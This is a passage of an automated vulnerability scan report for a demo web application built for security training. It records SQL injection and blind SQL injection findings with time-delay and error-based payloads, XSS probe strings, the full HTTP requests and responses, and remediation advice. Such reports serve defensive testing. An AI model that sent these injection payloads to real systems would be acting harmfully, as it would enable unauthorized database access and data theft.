GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; } @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width: 280px; } } </style></head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
1 TOTAL  MEDIUM
1 CONFIRMED

8 Critical Form Served over HTTP
Netsparker detected that a critical form is served over HTTP.
Impact: If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing the action attribute of the form to steal the user's password. Even though the target page is HTTPS, this does not protect the system against man-in-the-middle attacks.
This issue is important as it negates the use of SSL as a privacy protection barrier.
Actions to Take:
1. See the remedy for solution.
2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.
Remedy: All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
8.1 /Account/Login  CONFIRMED  http://hackyourselffirst.troyhunt.com/Account/Login
Form target action: https://hackyourselffirst.troyhunt.com/Account/Login
Request:
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Log in - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><…
3 TOTAL  MEDIUM

9 [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Although Netsparker believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.
Impact: There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking user's active session
- Changing the look of the page within the victim's browser
- Mounting a successful phishing attack
- Intercepting data and performing man-in-the-middle attacks
Remedy: This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.
There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti-cross-site scripting libraries.
Remedy References: [ASP.NET] - Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet
External References: XSS Cheat Sheet; OWASP - cross-site scripting; XSS Shell; XSS Tunnelling
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
9.1 /api/vote  http://hackyourselffirst.troyhunt.com/api/vote
Parameters:
Parameter   Type   Value
userId      POST   1
supercarId  POST   3
comments    POST   '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>
Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Certainty:
Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments='"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string ''\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.\r\nIncorrect syntax near ''\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n   at Web.Controllers.VoteController.Post(Vote vote)\r\n   at lambda_method(Closure , Object , Object[] )\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…
9.2 /api/admin  http://hackyourselffirst.troyhunt.com/api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt
Parameters:
Parameter   Type   Value
nsextt      GET    "--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>
Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Certainty:
Request:
GET /api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
5 TOTAL  CRITICAL
5 CONFIRMED

1 Blind SQL Injection
Netsparker identified a blind SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Netsparker confirmed the vulnerability by executing a test SQL query on the backend database. In these tests, SQL injection was not obvious, but the different responses from the page based on the injection test allowed us to identify and confirm the SQL injection.
Impact: Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database
- Executing commands on the underlying operating system
Actions to Take:
1. See the remedy for solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
3. Locate all the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see if there were any previous but undetected attacks on this resource.
Remedy: A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation: There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.
External References: OWASP SQL injection; SQL injection Cheat sheet
Remedy References: MSDN - Protect From SQL injection in ASP.NET
Classification: OWASP 2010-A1, OWASP 2013-A1, PCI V2.0-6.5.1, PCI V3.0-6.5.1, CWE-89, CAPEC-66, WASC-19
1.1 /Make/1  CONFIRMED  http://hackyourselffirst.troyhunt.com/Make/1?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--
Parameters:
Parameter   Type   Value
orderby     GET    1 WAITFOR DELAY '0:0:25'--
Request:
GET /Make/1?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:00:21 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Nissans - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1.2 /Supercar/Leaderboard  CONFIRMED  http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=1+WAITFOR+DELAY+%270%3a0%3a25%27-
Parameters:
Parameter   Type   Value
orderBy     GET    1 WAITFOR DELAY '0:0:25'--
asc         GET    false
Request:
GET /Supercar/Leaderboard?orderBy=1+WAITFOR+DELAY+%270%3a0%3a25%27--&asc=false HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:16:09 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2885
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Supercar Leaderboard - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1.3 /Make/3  CONFIRMED  http://hackyourselffirst.troyhunt.com/Make/3?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--
Parameters:
Parameter   Type   Value
orderby     GET    1 WAITFOR DELAY '0:0:25'--
Request:
GET /Make/3?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:06:47 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Paganis - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1.4 /Make/2  CONFIRMED  http://hackyourselffirst.troyhunt.com/Make/2?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--
Parameters:
Parameter   Type   Value
orderby     GET    1 WAITFOR DELAY '0:0:25'--
Request:
GET /Make/2?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:03:34 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>McLarens - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1.5 /api/vote CONFIRMED http://hackyourselffirst.troyhunt.com/api/vote
Parameters
Parameter   Type  Value
userId      POST  1
supercarId  POST  3
comments    POST  ') WAITFOR DELAY '0:0:25'--
Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 68
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%27)+WAITFOR+DELAY+%270%3a0%3a25%27--
Response
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:21:22 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1
5 TOTAL CRITICAL
5 CONFIRMED
2 SQL Injection
Netsparker identified an SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Netsparker confirmed the vulnerability by executing a test SQL query on the backend database.
Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following types of attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database
- Executing commands on the underlying operating system
Actions to Take
1. See the remedy for solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
